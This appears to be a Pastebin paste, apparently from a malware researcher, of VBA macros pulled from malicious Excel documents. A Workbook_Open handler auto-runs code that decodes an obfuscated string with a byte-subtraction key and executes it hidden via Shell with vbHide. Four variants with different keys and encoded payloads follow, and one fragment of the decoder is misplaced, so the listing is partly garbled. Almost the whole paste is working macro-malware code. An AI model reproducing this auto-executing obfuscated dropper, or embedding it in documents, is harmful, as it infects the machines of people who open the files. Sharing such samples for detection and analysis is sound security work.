Advertisement
dynamoo

Malicious Excel macro

Feb 17th, 2015
776
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. REM ===== Main Module (all versions) =================================================================================================
 2.  
 3. Attribute VB_Name = "Ёта нига"
 4. Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
 5. Attribute VB_GlobalNameSpace = False
 6. Attribute VB_Creatable = False
 7. Attribute VB_PredeclaredId = True
 8. Attribute VB_Exposed = True
 9. Attribute VB_TemplateDerived = False
 10. Attribute VB_Customizable = True
 11. Sub Workbook_Open()
 12.     tyrtyaag
 13. End Sub
 14. y(i Mod UBound(bKey))
 15. End If
 16. Next i
 17.  lqjWjFO = StrConv(bData, vbUnicode)
 18. End Function
 19.  
 20. REM ===== Module 2 (all versions) ===================================================================================================
 21.  
 22. Attribute VB_Name = "Module2"
 23. Public Function lqjWjFO(ByVal strData As String, ByVal strKey As String)
 24.  
 25. Dim bData() As Byte
 26. Dim bKey() As Byte
 27. bData = StrConv(strData, vbFromUnicode)
 28. bKey = StrConv(strKey, vbFromUnicode)
 29. For i = 0 To UBound(bData)
 30. If i <= UBound(bKey) Then
 31. bData(i) = bData(i) - bKey(i)
 32. Else
 33. bData(i) = bData(i) - bKey(i Mod UBound(bKey))
 34. End If
 35. Next i
 36.  lqjWjFO = StrConv(bData, vbUnicode)
 37. End Function
 38.  
 39. REM ===== Module 1 (70C17F4AED600AC8121B8301D84C632C) =============================================================================
 40.  
 41. Attribute VB_Name = "Module1"
 42. Private Const yY1UL = "cWolIdDu"
 43. Private Const DDuKQ = "ÆÄÓŒx¯dÅÆæÑ»·¬ÈÃÛš®Ü©ƒ½ÑÀ‘“ÅÁÔϽ„—ÜÊãѶ’’È˝îƇÏÀÔÚ½r§ÆæڵӥǝØØ®ŒkËËã܃“sš{r”Œ¢š{›sÖ»ÔۮʩÉʞЯ׷΅ÒÍ«‹pŠ|ñ–´i¿¡¸»²Ó¨É¿ØÛ’¬rƸѓrŸdÈÏßÍ·Èdˆ«´¹™‰ ­ ¾Õ¸ÈªËÀÞµ‘’§Ä¹‘©‘³|˶’³­Ò»ÕԲӍ«…Ô䮟dÖËÐÞ½„i·œ¼¼nÀŽ¬¦ØۭʬÌƸ´wɼȒ"
 44.  
 45. Sub tyrtyaag()
 46. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
 47. Shell oPOJidsf, vbHide
 48. End Sub
 49.  
 50. REM ===== Module 1 (F584A24F2423784935912FEC4C69CAC3) =============================================================================
 51.  
 52. Attribute VB_Name = "Module1"
 53. Private Const yY1UL = "NmaYSkhE"
 54. Private Const DDuKQ = "±ÚÅy‚¶ˆ•ÜؾžгÙ͇¸ãÍn•¯¾Ê˜·°×ƼNj»ÇàÕ¾À™¶³á°¸Í«ºÖÆÇÇ”–’ÜØÇ¿Úɲ³ÊŸ“¶áÕɍš—‡Ÿ†™ †›™‚Þ̳ÜÆ¿¸ÑÛ}ÑÇÌÆÖ–±ÎÀ’¢²®©xDz—¼ÊÈ·Ñзܪ¡ÎÉ°”Š”sÐà¾ÎϽs¼“º±~¯µ±Öн¹Óѽ¶©‡¶ÌÊn’µž »ª·ª¨¼ÚÌ´ÕÊÈœ³–³åÆ”sÞܯßÕyx¿­›½†µ´··ÜÅ¿»Ô×—µ¾ËУ"
 55.  
 56. Sub tyrtyaag()
 57. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
 58. Shell oPOJidsf, vbHide
 59. End Sub
 60.  
 61. REM ===== Module 1 (20ABED801D3E69237741BE1478807AE9) =============================================================================
 62.  
 63. Attribute VB_Name = "Module1"
 64. Private Const yY1UL = "QvDWeTuu"
 65. Private Const DDuKQ = "´ã¨w”Ÿ•Å廼קݶⰅÊÌÚqž’¼ÜÄ³à©ºÙtÈÊ鸼҂öêr®Ê¶¸½ß©ÅÙ}£•å»ÅÑÃÖµ¼­ÃÊ|œ¹ê¸ÇŸƒ¤‡¨rŽ›‚©„¤u™ƒèµÛ³¼Ë¹ÛÄ¥¨½ØÇàÙ¥¹Œ€œvʉ¤µyÑ›¿“ÀԸ۹߳ ­‚زØk€ tÚÉæ¥ÅÉtš¥»‘§Š°¿šÅ­Æɺݺ卟“·Ö³–i«ª¡ÅvÒŽ ´½äµÜ¬Àԝ½Û¼¼ tèÅ׶˅yɖÔ|Áž¾ ß³»Ë¼ÞÀ¿Œ…ÊÌÚŒ"
 66. Sub tyrtyaag()
 67. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
 68. Shell oPOJidsf, vbHide
 69. End Sub
 70.  
 71. REM ===== Module 1 (725E148FE02413180043BEB27658F1C9) =============================================================================
 72.  
 73. Attribute VB_Name = "Module1"
 74. Private Const yY1UL = "JsrfRsPb"
 75. Private Const DDuKQ = "­àÖ†¾p²âéËÄƸ¯ßÞ”·ëµj›ÀËÉ Ÿ¬Ý×ÉÆ“£ÃææË¿¡ž¯ç ½·Õ“¶Ü×ÔÆœ~ŽâéԾⱮ¹ÛÒ·›w²çæÖŒ¢~© š€¥ƒ|¡¤–ˆ¢Ã®Øá˸ض½¢ÖÌÅæ»xÖÓÈyŸwoÇ·³¢˜¬”¼ÁÏÁ׶²Üᯚ¡³«Õ™“µÂãÓÔ¶“už¸¿¶wÏš“ÂÛÕ¶Ù¸³â»®€Ö±¬“—º—À oϼ¯¡Ü¿®ÙÚÏÁ¼˜xØêˍ“þÔäÚr˜¤À‹®½™™Üáʸ۹¹¼º”·ëµ…"
 76.  
 77. Sub tyrtyaag()
 78. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
 79. Shell oPOJidsf, vbHide
 80. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement